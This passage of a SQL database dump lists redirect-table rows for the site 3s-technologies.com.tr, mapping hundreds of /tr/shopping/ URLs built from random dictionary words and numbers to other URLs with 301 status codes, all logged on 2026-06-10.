00:00:00',301),(67474,'https://3s-technologies.com.tr/tr/shopping/audax/2091449898.html',NULL,'https://3s-technologies.com.tr/shopping/audax/2091449898.html','',1,0,'2026-06-10 23:20:32','0000-00-00 00:00:00',301),(67475,'https://3s-technologies.com.tr/tr/shopping/corrosion/3321844628.html',NULL,'https://3s-technologies.com.tr/shopping/corrosion/3321844628.html','',1,0,'2026-06-10 23:20:35','0000-00-00 00:00:00',301),(67476,'https://3s-technologies.com.tr/tr/shopping/discriminal/2371793404.html',NULL,'https://3s-technologies.com.tr/shopping/discriminal/2371793404.html','',1,0,'2026-06-10 23:20:37','0000-00-00 00:00:00',301),(67477,'https://3s-technologies.com.tr/tr/shopping/banewort/1055211577.html',NULL,'https://3s-technologies.com.tr/shopping/banewort/1055211577.html','',1,0,'2026-06-10 23:20:41','0000-00-00 00:00:00',301),(67478,'https://3s-technologies.com.tr/tr/shopping/conacre/1723683388.html',NULL,'https://3s-technologies.com.tr/shopping/conacre/1723683388.html','',1,0,'2026-06-10 23:20:48','0000-00-00 00:00:00',301),(67479,'https://3s-technologies.com.tr/tr/shopping/impostor/3157202389.html',NULL,'https://3s-technologies.com.tr/shopping/impostor/3157202389.html','',1,0,'2026-06-10 23:20:50','0000-00-00 00:00:00',301),(67480,'https://3s-technologies.com.tr/tr/shopping/pantometric/777285513.html',NULL,'https://3s-technologies.com.tr/shopping/pantometric/777285513.html','',1,0,'2026-06-10 23:20:53','0000-00-00 00:00:00',301),(67481,'https://3s-technologies.com.tr/tr/shopping/monodelph/382962502.html',NULL,'https://3s-technologies.com.tr/shopping/monodelph/382962502.html','',1,0,'2026-06-10 23:20:56','0000-00-00 00:00:00',301),(67482,'https://3s-technologies.com.tr/tr/shopping/enforcive/563634098.html',NULL,'https://3s-technologies.com.tr/shopping/enforcive/563634098.html','',1,0,'2026-06-10 23:20:59','0000-00-00 00:00:00',301),(67483,'https://3s-technologies.com.tr/tr/shopping/hullabaloo/1601058464.html',NULL,'https://3s-technologies.com.tr/shopping/hullabaloo/1601058464.html','',1,0,'2026-06-10 23:21:03','0000-00-00 00:00:00',301),(67484,'https://3s-technologies.com.tr/tr/shopping/inconsiderably/2848598533.html',NULL,'https://3s-technologies.com.tr/shopping/inconsiderably/2848598533.html','',1,0,'2026-06-10 23:21:05','0000-00-00 00:00:00',301),(67485,'https://3s-technologies.com.tr/tr/shopping/stickleback/2511042334.html',NULL,'https://3s-technologies.com.tr/shopping/stickleback/2511042334.html','',1,0,'2026-06-10 23:21:08','0000-00-00 00:00:00',301),(67486,'https://3s-technologies.com.tr/tr/shopping/synepy/2572564511.html',NULL,'https://3s-technologies.com.tr/shopping/synepy/2572564511.html','',1,0,'2026-06-10 23:21:11','0000-00-00 00:00:00',301),(67487,'https://3s-technologies.com.tr/tr/shopping/tomnoddy/381750403.html',NULL,'https://3s-technologies.com.tr/shopping/tomnoddy/381750403.html','',1,0,'2026-06-10 23:21:14','0000-00-00 00:00:00',301),(67488,'https://3s-technologies.com.tr/tr/shopping/murrhine/222441586.html',NULL,'https://3s-technologies.com.tr/shopping/murrhine/222441586.html','',1,0,'2026-06-10 23:21:17','0000-00-00 00:00:00',301),(67489,'https://3s-technologies.com.tr/tr/shopping/lavishment/4201289930.html',NULL,'https://3s-technologies.com.tr/shopping/lavishment/4201289930.html','',1,0,'2026-06-10 23:21:20','0000-00-00 00:00:00',301),(67490,'https://3s-technologies.com.tr/tr/shopping/beautiful/1563415293.html',NULL,'https://3s-technologies.com.tr/shopping/beautiful/1563415293.html','',1,0,'2026-06-10 23:21:23','0000-00-00 00:00:00',301),(67491,'https://3s-technologies.com.tr/tr/shopping/horsing/3926068731.html',NULL,'https://3s-technologies.com.tr/shopping/horsing/3926068731.html','',1,0,'2026-06-10 23:21:26','0000-00-00 00:00:00',301),(67492,'https://3s-technologies.com.tr/tr/shopping/spermist/929628967.html',NULL,'https://3s-technologies.com.tr/shopping/spermist/929628967.html','',1,0,'2026-06-10 23:21:29','0000-00-00 00:00:00',301),(67493,'https://3s-technologies.com.tr/tr/shopping/proletarian/4022019055.html',NULL,'https://3s-technologies.com.tr/shopping/proletarian/4022019055.html','',1,0,'2026-06-10 23:21:36','0000-00-00 00:00:00',301),(67494,'https://3s-technologies.com.tr/tr/shopping/triste/1265299928.html',NULL,'https://3s-technologies.com.tr/shopping/triste/1265299928.html','',1,0,'2026-06-10 23:21:40','0000-00-00 00:00:00',301),(67495,'https://3s-technologies.com.tr/tr/shopping/revertive/2968099605.html',NULL,'https://3s-technologies.com.tr/shopping/revertive/2968099605.html','',1,0,'2026-06-10 23:21:44','0000-00-00 00:00:00',301),(67496,'https://3s-technologies.com.tr/tr/shopping/enchain/404400242.html',NULL,'https://3s-technologies.com.tr/shopping/enchain/404400242.html','',1,0,'2026-06-10 23:21:46','0000-00-00 00:00:00',301),(67497,'https://3s-technologies.com.tr/tr/shopping/retrievably/3923020300.html',NULL,'https://3s-technologies.com.tr/shopping/retrievably/3923020300.html','',1,0,'2026-06-10 23:21:49','0000-00-00 00:00:00',301),(67498,'https://3s-technologies.com.tr/tr/shopping/punty/980204142.html',NULL,'https://3s-technologies.com.tr/shopping/punty/980204142.html','',1,0,'2026-06-10 23:21:52','0000-00-00 00:00:00',301),(67499,'https://3s-technologies.com.tr/tr/shopping/curateship/2585217592.html',NULL,'https://3s-technologies.com.tr/shopping/curateship/2585217592.html','',1,0,'2026-06-10 23:21:57','0000-00-00 00:00:00',301),(67500,'https://3s-technologies.com.tr/tr/shopping/convect/1569496831.html',NULL,'https://3s-technologies.com.tr/shopping/convect/1569496831.html','',1,0,'2026-06-10 23:21:59','0000-00-00 00:00:00',301),(67501,'https://3s-technologies.com.tr/tr/shopping/telotrochal/3103023330.html',NULL,'https://3s-technologies.com.tr/shopping/telotrochal/3103023330.html','',1,0,'2026-06-10 23:22:02','0000-00-00 00:00:00',301),(67502,'https://3s-technologies.com.tr/tr/shopping/tamper/3666505906.html',NULL,'https://3s-technologies.com.tr/shopping/tamper/3666505906.html','',1,0,'2026-06-10 23:22:05','0000-00-00 00:00:00',301),(67503,'https://3s-technologies.com.tr/tr/shopping/bijoutry/2552439917.html',NULL,'https://3s-technologies.com.tr/shopping/bijoutry/2552439917.html','',1,0,'2026-06-10 23:22:08','0000-00-00 00:00:00',301),(67504,'https://3s-technologies.com.tr/tr/shopping/ferruminate/606357838.html',NULL,'https://3s-technologies.com.tr/shopping/ferruminate/606357838.html','',1,0,'2026-06-10 23:22:11','0000-00-00 00:00:00',301),(67505,'https://3s-technologies.com.tr/tr/shopping/sweepstakes/2093727657.html',NULL,'https://3s-technologies.com.tr/shopping/sweepstakes/2093727657.html','',1,0,'2026-06-10 23:22:14','0000-00-00 00:00:00',301),(67506,'https://3s-technologies.com.tr/tr/shopping/lepadoid/3430415766.html',NULL,'https://3s-technologies.com.tr/shopping/lepadoid/3430415766.html','',1,0,'2026-06-10 23:22:17','0000-00-00 00:00:00',301),(67507,'https://3s-technologies.com.tr/tr/shopping/etamine/1682517089.html',NULL,'https://3s-technologies.com.tr/shopping/etamine/1682517089.html','',1,0,'2026-06-10 23:22:20','0000-00-00 00:00:00',301),(67508,'https://3s-technologies.com.tr/tr/shopping/sundried/1992957277.html',NULL,'https://3s-technologies.com.tr/shopping/sundried/1992957277.html','',1,0,'2026-06-10 23:22:23','0000-00-00 00:00:00',301),(67509,'https://3s-technologies.com.tr/tr/shopping/nonsonant/183176283.html',NULL,'https://3s-technologies.com.tr/shopping/nonsonant/183176283.html','',1,0,'2026-06-10 23:22:26','0000-00-00 00:00:00',301),(67510,'https://3s-technologies.com.tr/tr/shopping/directorate/1553025618.html',NULL,'https://3s-technologies.com.tr/shopping/directorate/1553025618.html','',1,0,'2026-06-10 23:22:29','0000-00-00 00:00:00',301),(67511,'https://3s-technologies.com.tr/tr/shopping/inaccuracies/3870510948.html',NULL,'https://3s-technologies.com.tr/shopping/inaccuracies/3870510948.html','',1,0,'2026-06-10 23:22:32','0000-00-00 00:00:00',301),(67512,'https://3s-technologies.com.tr/tr/shopping/merchandise/2256716385.html',NULL,'https://3s-technologies.com.tr/shopping/merchandise/2256716385.html','',1,0,'2026-06-10 23:22:37','0000-00-00 00:00:00',301),(67513,'https://3s-technologies.com.tr/tr/shopping/peritonitis/1135668789.html',NULL,'https://3s-technologies.com.tr/shopping/peritonitis/1135668789.html','',1,0,'2026-06-10 23:22:42','0000-00-00 00:00:00',301),(67514,'https://3s-technologies.com.tr/tr/shopping/skart/3591889189.html',NULL,'https://3s-technologies.com.tr/shopping/skart/3591889189.html','',1,0,'2026-06-10 23:22:45','0000-00-00 00:00:00',301),(67515,'https://3s-technologies.com.tr/tr/shopping/kitten/2361123062.html',NULL,'https://3s-technologies.com.tr/shopping/kitten/2361123062.html','',1,0,'2026-06-10 23:22:48','0000-00-00 00:00:00',301),(67516,'https://3s-technologies.com.tr/tr/shopping/filibuster/3140126242.html',NULL,'https://3s-technologies.com.tr/shopping/filibuster/3140126242.html','',1,0,'2026-06-10 23:22:51','0000-00-00 00:00:00',301),(67517,'https://3s-technologies.com.tr/tr/shopping/balneatory/1052506728.html',NULL,'https://3s-technologies.com.tr/shopping/balneatory/1052506728.html','',1,0,'2026-06-10 23:22:54','0000-00-00 00:00:00',301),(67518,'https://3s-technologies.com.tr/tr/shopping/tucutuco/2730127757.html',NULL,'https://3s-technologies.com.tr/shopping/tucutuco/2730127757.html','',1,0,'2026-06-10 23:22:57','0000-00-00 00:00:00',301),(67519,'https://3s-technologies.com.tr/tr/shopping/superstruction/2244326839.html',NULL,'https://3s-technologies.com.tr/shopping/superstruction/2244326839.html','',1,0,'2026-06-10 23:23:00','0000-00-00 00:00:00',301),(67520,'https://3s-technologies.com.tr/tr/shopping/patrocinate/1474804014.html',NULL,'https://3s-technologies.com.tr/shopping/patrocinate/1474804014.html','',1,0,'2026-06-10 23:23:03','0000-00-00 00:00:00',301),(67521,'https://3s-technologies.com.tr/tr/shopping/larvacea/2617565994.html',NULL,'https://3s-technologies.com.tr/shopping/larvacea/2617565994.html','',1,0,'2026-06-10 23:23:06','0000-00-00 00:00:00',301),(67522,'https://3s-technologies.com.tr/tr/shopping/anhima/3018460564.html',NULL,'https://3s-technologies.com.tr/shopping/anhima/3018460564.html','',1,0,'2026-06-10 23:23:09','0000-00-00 00:00:00',301),(67523,'https://3s-technologies.com.tr/tr/shopping/conquian/1402501396.html',NULL,'https://3s-technologies.com.tr/shopping/conquian/1402501396.html','',1,0,'2026-06-10 23:23:12','0000-00-00 00:00:00',301),(67524,'https://3s-technologies.com.tr/tr/shopping/babblery/4004172220.html',NULL,'https://3s-technologies.com.tr/shopping/babblery/4004172220.html','',1,0,'2026-06-10 23:23:15','0000-00-00 00:00:00',301),(67525,'http://3s-technologies.com.tr/en/shopping/raffling/3661138003.html',NULL,'','',1,0,'2026-06-10 23:23:17','0000-00-00 00:00:00',301),(67526,'https://3s-technologies.com.tr/tr/shopping/dilleniidae/1314218375.html',NULL,'https://3s-technologies.com.tr/shopping/dilleniidae/1314218375.html','',1,0,'2026-06-10 23:23:18','0000-00-00 00:00:00',301),(67527,'http://3s-technologies.com.tr/tr/shopping/tauriform/1845916246.html',NULL,'','',1,0,'2026-06-10 23:23:19','0000-00-00 00:00:00',301),(67528,'https://3s-technologies.com.tr/tr/shopping/disloyally/2440492074.html',NULL,'https://3s-technologies.com.tr/shopping/disloyally/2440492074.html','',1,0,'2026-06-10 23:23:21','0000-00-00 00:00:00',301),(67529,'http://3s-technologies.com.tr/tr/shopping/immutableness/3962490373.html',NULL,'','',1,0,'2026-06-10 23:23:22','0000-00-00 00:00:00',301),(67530,'https://3s-technologies.com.tr/tr/shopping/glaum/1116333179.html',NULL,'https://3s-technologies.com.tr/shopping/glaum/1116333179.html','',1,0,'2026-06-10 23:23:24','0000-00-00 00:00:00',301),(67531,'http://3s-technologies.com.tr/tr/shopping/crengle/2232994558.html',NULL,'','',1,0,'2026-06-10 23:23:25','0000-00-00 00:00:00',301),(67532,'https://3s-technologies.com.tr/tr/shopping/busying/3231858714.html',NULL,'https://3s-technologies.com.tr/shopping/busying/3231858714.html','',1,0,'2026-06-10 23:23:27','0000-00-00 00:00:00',301),(67533,'http://3s-technologies.com.tr/tr/shopping/napaea/3866472304.html',NULL,'','',2,0,'2026-06-10 23:23:27','0000-00-00 00:00:00',301),(67534,'https://3s-technologies.com.tr/tr/shopping/silverbill/1099354861.html',NULL,'https://3s-technologies.com.tr/shopping/silverbill/1099354861.html','',1,0,'2026-06-10 23:23:30','0000-00-00 00:00:00',301),(67535,'http://3s-technologies.com.tr/tr/shopping/hirundo/2791215174.html',NULL,'','',1,0,'2026-06-10 23:23:32','0000-00-00 00:00:00',301),(67536,'https://3s-technologies.com.tr/tr/shopping/subtangent/458251043.html',NULL,'https://3s-technologies.com.tr/shopping/subtangent/458251043.html','',1,0,'2026-06-10 23:23:33','0000-00-00 00:00:00',301),(67537,'https://3s-technologies.com.tr/tr/shopping/afghan/3975034785.html',NULL,'https://3s-technologies.com.tr/shopping/afghan/3975034785.html','',1,0,'2026-06-10 23:23:36','0000-00-00 00:00:00',301),(67538,'https://3s-technologies.com.tr/tr/shopping/manubria/2149571530.html',NULL,'https://3s-technologies.com.tr/shopping/manubria/2149571530.html','',1,0,'2026-06-10 23:23:39','0000-00-00 00:00:00',301),(67539,'https://3s-technologies.com.tr/tr/shopping/vinette/1872503714.html',NULL,'https://3s-technologies.com.tr/shopping/vinette/1872503714.html','',1,0,'2026-06-10 23:23:43','0000-00-00 00:00:00',301),(67540,'https://3s-technologies.com.tr/tr/shopping/gnoma/1527543747.html',NULL,'https://3s-technologies.com.tr/shopping/gnoma/1527543747.html','',1,0,'2026-06-10 23:23:45','0000-00-00 00:00:00',301),(67541,'https://3s-technologies.com.tr/tr/shopping/pasture/2265222105.html',NULL,'https://3s-technologies.com.tr/shopping/pasture/2265222105.html','',1,0,'2026-06-10 23:23:48','0000-00-00 00:00:00',301),(67542,'https://3s-technologies.com.tr/tr/shopping/vanilloes/1965195448.html',NULL,'https://3s-technologies.com.tr/shopping/vanilloes/1965195448.html','',1,0,'2026-06-10 23:23:51','0000-00-00 00:00:00',301),(67543,'https://3s-technologies.com.tr/tr/shopping/wakif/3358113180.html',NULL,'https://3s-technologies.com.tr/shopping/wakif/3358113180.html','',1,0,'2026-06-10 23:23:54','0000-00-00 00:00:00',301),(67544,'https://3s-technologies.com.tr/tr/shopping/glutinating/1692234924.html',NULL,'https://3s-technologies.com.tr/shopping/glutinating/1692234924.html','',1,0,'2026-06-10 23:23:57','0000-00-00 00:00:00',301),(67545,'https://3s-technologies.com.tr/tr/shopping/infrabranchial/545674094.html',NULL,'https://3s-technologies.com.tr/shopping/infrabranchial/545674094.html','',1,0,'2026-06-10 23:24:00','0000-00-00 00:00:00',301),(67546,'https://3s-technologies.com.tr/tr/shopping/clathrate/4048062651.html',NULL,'https://3s-technologies.com.tr/shopping/clathrate/4048062651.html','',1,0,'2026-06-10 23:24:03','0000-00-00 00:00:00',301),(67547,'https://3s-technologies.com.tr/tr/shopping/handcart/2441444565.html',NULL,'https://3s-technologies.com.tr/shopping/handcart/2441444565.html','',1,0,'2026-06-10 23:24:07','0000-00-00 00:00:00',301),(67548,'https://3s-technologies.com.tr/tr/shopping/omosaurus/1796824407.html',NULL,'https://3s-technologies.com.tr/shopping/omosaurus/1796824407.html','',1,0,'2026-06-10 23:24:09','0000-00-00 00:00:00',301),(67549,'https://3s-technologies.com.tr/tr/shopping/speciousness/3427828061.html',NULL,'https://3s-technologies.com.tr/shopping/speciousness/3427828061.html','',1,0,'2026-06-10 23:24:14','0000-00-00 00:00:00',301),(67550,'https://3s-technologies.com.tr/tr/shopping/diatomophyceae/2042925271.html',NULL,'https://3s-technologies.com.tr/shopping/diatomophyceae/2042925271.html','',1,0,'2026-06-10 23:24:17','0000-00-00 00:00:00',301),(67551,'https://3s-technologies.com.tr/tr/shopping/fabrile/2860299139.html',NULL,'https://3s-technologies.com.tr/shopping/fabrile/2860299139.html','',1,0,'2026-06-10 23:24:20','0000-00-00 00:00:00',301),(67552,'https://3s-technologies.com.tr/tr/shopping/crossopterygian/1841201673.html',NULL,'https://3s-technologies.com.tr/shopping/crossopterygian/1841201673.html','',1,0,'2026-06-10 23:24:23','0000-00-00 00:00:00',301),(67553,'https://3s-technologies.com.tr/tr/shopping/canada/3782442143.html',NULL,'https://3s-technologies.com.tr/shopping/canada/3782442143.html','',1,0,'2026-06-10 23:24:26','0000-00-00 00:00:00',301),(67554,'https://3s-technologies.com.tr/tr/shopping/drave/1102614406.html',NULL,'https://3s-technologies.com.tr/shopping/drave/1102614406.html','',1,0,'2026-06-10 23:24:28','0000-00-00 00:00:00',301),(67555,'https://3s-technologies.com.tr/tr/shopping/heroicalness/2720786658.html',NULL,'https://3s-technologies.com.tr/shopping/heroicalness/2720786658.html','',1,0,'2026-06-10 23:24:32','0000-00-00 00:00:00',301),(67556,'https://3s-technologies.com.tr/tr/shopping/subulicornes/327294652.html',NULL,'https://3s-technologies.com.tr/shopping/subulicornes/327294652.html','',1,0,'2026-06-10 23:24:34','0000-00-00 00:00:00',301),(67557,'https://3s-technologies.com.tr/tr/shopping/renversement/4141260503.html',NULL,'https://3s-technologies.com.tr/shopping/renversement/4141260503.html','',1,0,'2026-06-10 23:24:37','0000-00-00 00:00:00',301),(67558,'https://3s-technologies.com.tr/tr/shopping/soubah/812929816.html',NULL,'https://3s-technologies.com.tr/shopping/soubah/812929816.html','',1,0,'2026-06-10 23:24:41','0000-00-00 00:00:00',301),(67559,'https://3s-technologies.com.tr/tr/shopping/marlitic/2494834688.html',NULL,'https://3s-technologies.com.tr/shopping/marlitic/2494834688.html','',1,0,'2026-06-10 23:24:48','0000-00-00 00:00:00',301),(67560,'https://3s-technologies.com.tr/tr/shopping/misspent/2512535084.html',NULL,'https://3s-technologies.com.tr/shopping/misspent/2512535084.html','',1,0,'2026-06-10 23:24:50','0000-00-00 00:00:00',301),(67561,'https://3s-technologies.com.tr/tr/shopping/enemys/2325251548.html',NULL,'https://3s-technologies.com.tr/shopping/enemys/2325251548.html','',1,0,'2026-06-10 23:24:53','0000-00-00 00:00:00',301),(67562,'https://3s-technologies.com.tr/tr/shopping/totemic/604982200.html',NULL,'https://3s-technologies.com.tr/shopping/totemic/604982200.html','',1,0,'2026-06-10 23:24:56','0000-00-00 00:00:00',301),(67563,'https://3s-technologies.com.tr/tr/shopping/steaminess/444467611.html',NULL,'https://3s-technologies.com.tr/shopping/steaminess/444467611.html','',1,0,'2026-06-10 23:24:59','0000-00-00 00:00:00',301),(67564,'https://3s-technologies.com.tr/tr/shopping/asbestiform/910833616.html',NULL,'https://3s-technologies.com.tr/shopping/asbestiform/910833616.html','',1,0,'2026-06-10 23:25:02','0000-00-00 00:00:00',301),(67565,'https://3s-technologies.com.tr/tr/shopping/sugarplum/2514959282.html',NULL,'https://3s-technologies.com.tr/shopping/sugarplum/2514959282.html','',1,0,'2026-06-10 23:25:05','0000-00-00 00:00:00',301),(67566,'https://3s-technologies.com.tr/tr/shopping/recursant/2463551930.html',NULL,'https://3s-technologies.com.tr/shopping/recursant/2463551930.html','',1,0,'2026-06-10 23:25:08','0000-00-00 00:00:00',301),(67567,'https://3s-technologies.com.tr/tr/shopping/thermidor/418606805.html',NULL,'https://3s-technologies.com.tr/shopping/thermidor/418606805.html','',1,0,'2026-06-10 23:25:11','0000-00-00 00:00:00',301),(67568,'https://3s-technologies.com.tr/tr/shopping/redhibitory/3466846838.html',NULL,'https://3s-technologies.com.tr/shopping/redhibitory/3466846838.html','',1,0,'2026-06-10 23:25:14','0000-00-00 00:00:00',301),(67569,'http://3s-technologies.com.tr/tr/shopping/halecidota/609185725.html',NULL,'','',2,0,'2026-06-10 23:25:15','0000-00-00 00:00:00',301),(67570,'https://3s-technologies.com.tr/tr/shopping/quavered/2060280325.html',NULL,'https://3s-technologies.com.tr/shopping/quavered/2060280325.html','',1,0,'2026-06-10 23:25:20','0000-00-00 00:00:00',301),(67571,'http://3s-technologies.com.tr/tr/shopping/ardennes/3883220209.html',NULL,'','',2,0,'2026-06-10 23:25:21','0000-00-00 00:00:00',301),(67572,'https://3s-technologies.com.tr/tr/shopping/electromotion/2847646042.html',NULL,'https://3s-technologies.com.tr/shopping/electromotion/2847646042.html','',1,0,'2026-06-10 23:25:22','0000-00-00 00:00:00',301),(67573,'http://3s-technologies.com.tr/tr/shopping/gavidae/4083714624.html',NULL,'','',2,0,'2026-06-10 23:25:24','0000-00-00 00:00:00',301),(67574,'https://3s-technologies.com.tr/tr/shopping/antagonized/2611306596.html',NULL,'https://3s-technologies.com.tr/shopping/antagonized/2611306596.html','',1,0,'2026-06-10 23:25:25','0000-00-00 00:00:00',301),(67575,'https://3s-technologies.com.tr/tr/shopping/monobasic/1498406312.html',NULL,'https://3s-technologies.com.tr/shopping/monobasic/1498406312.html','',1,0,'2026-06-10 23:25:28','0000-00-00 00:00:00',301),(67576,'http://3s-technologies.com.tr/tr/shopping/binoculate/4178520610.html',NULL,'','',2,0,'2026-06-10 23:25:28','0000-00-00 00:00:00',301),(67577,'https://3s-technologies.com.tr/tr/shopping/amalgama/3807926181.html',NULL,'https://3s-technologies.com.tr/shopping/amalgama/3807926181.html','',1,0,'2026-06-10 23:25:31','0000-00-00 00:00:00',301),(67578,'http://3s-technologies.com.tr/tr/shopping/affrap/2278766713.html',NULL,'','',2,0,'2026-06-10 23:25:32','0000-00-00 00:00:00',301),(67579,'https://3s-technologies.com.tr/tr/shopping/noteless/1640220423.html',NULL,'https://3s-technologies.com.tr/shopping/noteless/1640220423.html','',1,0,'2026-06-10 23:25:34','0000-00-00 00:00:00',301),(67580,'https://3s-technologies.com.tr/tr/shopping/decumaria/2962135211.html',NULL,'https://3s-technologies.com.tr/shopping/decumaria/2962135211.html','',1,0,'2026-06-10 23:25:37','0000-00-00 00:00:00',301),(67581,'http://3s-technologies.com.tr/tr/shopping/frigatoon/1028525309.html',NULL,'','',2,0,'2026-06-10 23:25:37','0000-00-00 00:00:00',301),(67582,'https://3s-technologies.com.tr/tr/shopping/sittine/3106400003.html',NULL,'https://3s-technologies.com.tr/shopping/sittine/3106400003.html','',1,0,'2026-06-10 23:25:40','0000-00-00 00:00:00',301),(67583,'https://3s-technologies.com.tr/tr/shopping/prender/3620519535.html',NULL,'https://3s-technologies.com.tr/shopping/prender/3620519535.html','',1,0,'2026-06-10 23:25:43','0000-00-00 00:00:00',301),(67584,'https://3s-technologies.com.tr/tr/shopping/glacis/1356729225.html',NULL,'https://3s-technologies.com.tr/shopping/glacis/1356729225.html','',1,0,'2026-06-10 23:25:46','0000-00-00 00:00:00',301),(67585,'https://3s-technologies.com.tr/tr/shopping/tasseled/3964104835.html',NULL,'https://3s-technologies.com.tr/shopping/tasseled/3964104835.html','',1,0,'2026-06-10 23:25:49','0000-00-00 00:00:00',301),(67586,'https://3s-technologies.com.tr/tr/shopping/garpike/11985025.html',NULL,'https://3s-technologies.com.tr/shopping/garpike/11985025.html','',1,0,'2026-06-10 23:25:52','0000-00-00 00:00:00',301),(67587,'https://3s-technologies.com.tr/tr/shopping/saucy/2834815101.html',NULL,'https://3s-technologies.com.tr/shopping/saucy/2834815101.html','',1,0,'2026-06-10 23:25:55','0000-00-00 00:00:00',301),(67588,'https://3s-technologies.com.tr/tr/shopping/cabombaceae/3998094641.html',NULL,'https://3s-technologies.com.tr/shopping/cabombaceae/3998094641.html','',1,0,'2026-06-10 23:25:58','0000-00-00 00:00:00',301),(67589,'https://3s-technologies.com.tr/tr/shopping/nigrine/1076525402.html',NULL,'https://3s-technologies.com.tr/shopping/nigrine/1076525402.html','',1,0,'2026-06-10 23:26:01','0000-00-00 00:00:00',301),(67590,'https://3s-technologies.com.tr/tr/shopping/aggrievance/2367204600.html',NULL,'https://3s-technologies.com.tr/shopping/aggrievance/2367204600.html','',1,0,'2026-06-10 23:26:04','0000-00-00 00:00:00',301),(67591,'https://3s-technologies.com.tr/tr/shopping/adorable/2343098383.html',NULL,'https://3s-technologies.com.tr/shopping/adorable/2343098383.html','',1,0,'2026-06-10 23:26:09','0000-00-00 00:00:00',301),(67592,'https://3s-technologies.com.tr/tr/shopping/surcoat/1352027268.html',NULL,'https://3s-technologies.com.tr/shopping/surcoat/1352027268.html','',1,0,'2026-06-10 23:26:11','0000-00-00 00:00:00',301),(67593,'https://3s-technologies.com.tr/tr/shopping/colubridae/1551796419.html',NULL,'https://3s-technologies.com.tr/shopping/colubridae/1551796419.html','',1,0,'2026-06-10 23:26:14','0000-00-00 00:00:00',301),(67594,'https://3s-technologies.com.tr/tr/shopping/sicken/3482105968.html',NULL,'https://3s-technologies.com.tr/shopping/sicken/3482105968.html','',1,0,'2026-06-10 23:26:17','0000-00-00 00:00:00',301),(67595,'https://3s-technologies.com.tr/tr/shopping/sassaby/2005003209.html',NULL,'https://3s-technologies.com.tr/shopping/sassaby/2005003209.html','',1,0,'2026-06-10 23:26:20','0000-00-00 00:00:00',301),(67596,'https://3s-technologies.com.tr/tr/shopping/secreting/2164730600.html',NULL,'https://3s-technologies.com.tr/shopping/secreting/2164730600.html','',1,0,'2026-06-10 23:26:23','0000-00-00 00:00:00',301),(67597,'https://3s-technologies.com.tr/tr/shopping/incircumscription/341942658.html',NULL,'https://3s-technologies.com.tr/shopping/incircumscription/341942658.html','',1,0,'2026-06-10 23:26:26','0000-00-00 00:00:00',301),(67598,'https://3s-technologies.com.tr/tr/shopping/antiguggler/3425826994.html',NULL,'https://3s-technologies.com.tr/shopping/antiguggler/3425826994.html','',1,0,'2026-06-10 23:26:29','0000-00-00 00:00:00',301),(67599,'https://3s-technologies.com.tr/tr/shopping/inobservation/1022157194.html',NULL,'https://3s-technologies.com.tr/shopping/inobservation/1022157194.html','',1,0,'2026-06-10 23:26:32','0000-00-00 00:00:00',301),(67600,'https://3s-technologies.com.tr/tr/shopping/tittle/2856662842.html',NULL,'https://3s-technologies.com.tr/shopping/tittle/2856662842.html','',1,0,'2026-06-10 23:26:36','0000-00-00 00:00:00',301),(67601,'https://3s-technologies.com.tr/tr/shopping/widdy/953507973.html',NULL,'https://3s-technologies.com.tr/shopping/widdy/953507973.html','',1,0,'2026-06-10 23:26:39','0000-00-00 00:00:00',301),(67602,'https://3s-technologies.com.tr/tr/shopping/bodikin/4155303559.html',NULL,'https://3s-technologies.com.tr/shopping/bodikin/4155303559.html','',1,0,'2026-06-10 23:26:42','0000-00-00 00:00:00',301),(67603,'https://3s-technologies.com.tr/tr/shopping/remand/1331801659.html',NULL,'https://3s-technologies.com.tr/shopping/remand/1331801659.html','',1,0,'2026-06-10 23:26:45','0000-00-00 00:00:00',301),(67604,'https://3s-technologies.com.tr/tr/shopping/junketries/324966539.html',NULL,'https://3s-technologies.com.tr/shopping/junketries/324966539.html','',1,0,'2026-06-10 23:26:48','0000-00-00 00:00:00',301),(67605,'https://3s-technologies.com.tr/tr/shopping/frumenty/270852155.html',NULL,'https://3s-technologies.com.tr/shopping/frumenty/270852155.html','',1,0,'2026-06-10 23:26:51','0000-00-00 00:00:00',301),(67606,'https://3s-technologies.com.tr/tr/shopping/bezant/819011354.html',NULL,'https://3s-technologies.com.tr/shopping/bezant/819011354.html','',1,0,'2026-06-10 23:26:54','0000-00-00 00:00:00',301),(67607,'https://3s-technologies.com.tr/tr/shopping/branchial/3400345123.html',NULL,'https://3s-technologies.com.tr/shopping/branchial/3400345123.html','',1,0,'2026-06-10 23:26:57','0000-00-00 00:00:00',301),(67608,'https://3s-technologies.com.tr/tr/shopping/lanthanotus/3884671148.html',NULL,'https://3s-technologies.com.tr/shopping/lanthanotus/3884671148.html','',1,0,'2026-06-10 23:27:00','0000-00-00 00:00:00',301),(67609,'https://3s-technologies.com.tr/tr/shopping/enfeoffed/2338346056.html',NULL,'https://3s-technologies.com.tr/shopping/enfeoffed/2338346056.html','',1,0,'2026-06-10 23:27:07','0000-00-00 00:00:00',301),(67610,'https://3s-technologies.com.tr/tr/shopping/blackfooted/960801610.html',NULL,'https://3s-technologies.com.tr/shopping/blackfooted/960801610.html','',1,0,'2026-06-10 23:27:09','0000-00-00 00:00:00',301),(67611,'https://3s-technologies.com.tr/tr/shopping/craker/1560038604.html',NULL,'https://3s-technologies.com.tr/shopping/craker/1560038604.html','',1,0,'2026-06-10 23:27:12','0000-00-00 00:00:00',301),(67612,'https://3s-technologies.com.tr/tr/shopping/drent/2671843917.html',NULL,'https://3s-technologies.com.tr/shopping/drent/2671843917.html','',1,0,'2026-06-10 23:27:15','0000-00-00 00:00:00',301),(67613,'https://3s-technologies.com.tr/tr/shopping/outboard/2801218244.html',NULL,'https://3s-technologies.com.tr/shopping/outboard/2801218244.html','',1,0,'2026-06-10 23:27:18','0000-00-00 00:00:00',301),(67614,'https://3s-technologies.com.tr/tr/shopping/percipience/2406895249.html',NULL,'https://3s-technologies.com.tr/shopping/percipience/2406895249.html','',1,0,'2026-06-10 23:27:21','0000-00-00 00:00:00',301),(67615,'http://3s-technologies.com.tr/tr/shopping/passed/43001799.html',NULL,'','',1,0,'2026-06-10 23:27:24','0000-00-00 00:00:00',301),(67616,'https://3s-technologies.com.tr/tr/shopping/geometricus/1145191723.html',NULL,'https://3s-technologies.com.tr/shopping/geometricus/1145191723.html','',1,0,'2026-06-10 23:27:24','0000-00-00 00:00:00',301),(67617,'http://3s-technologies.com.tr/tr/shopping/adobelily/2786626402.html',NULL,'','',2,0,'2026-06-10 23:27:27','0000-00-00 00:00:00',301),(67618,'https://3s-technologies.com.tr/tr/shopping/sonderclass/3915726647.html',NULL,'https://3s-technologies.com.tr/shopping/sonderclass/3915726647.html','',1,0,'2026-06-10 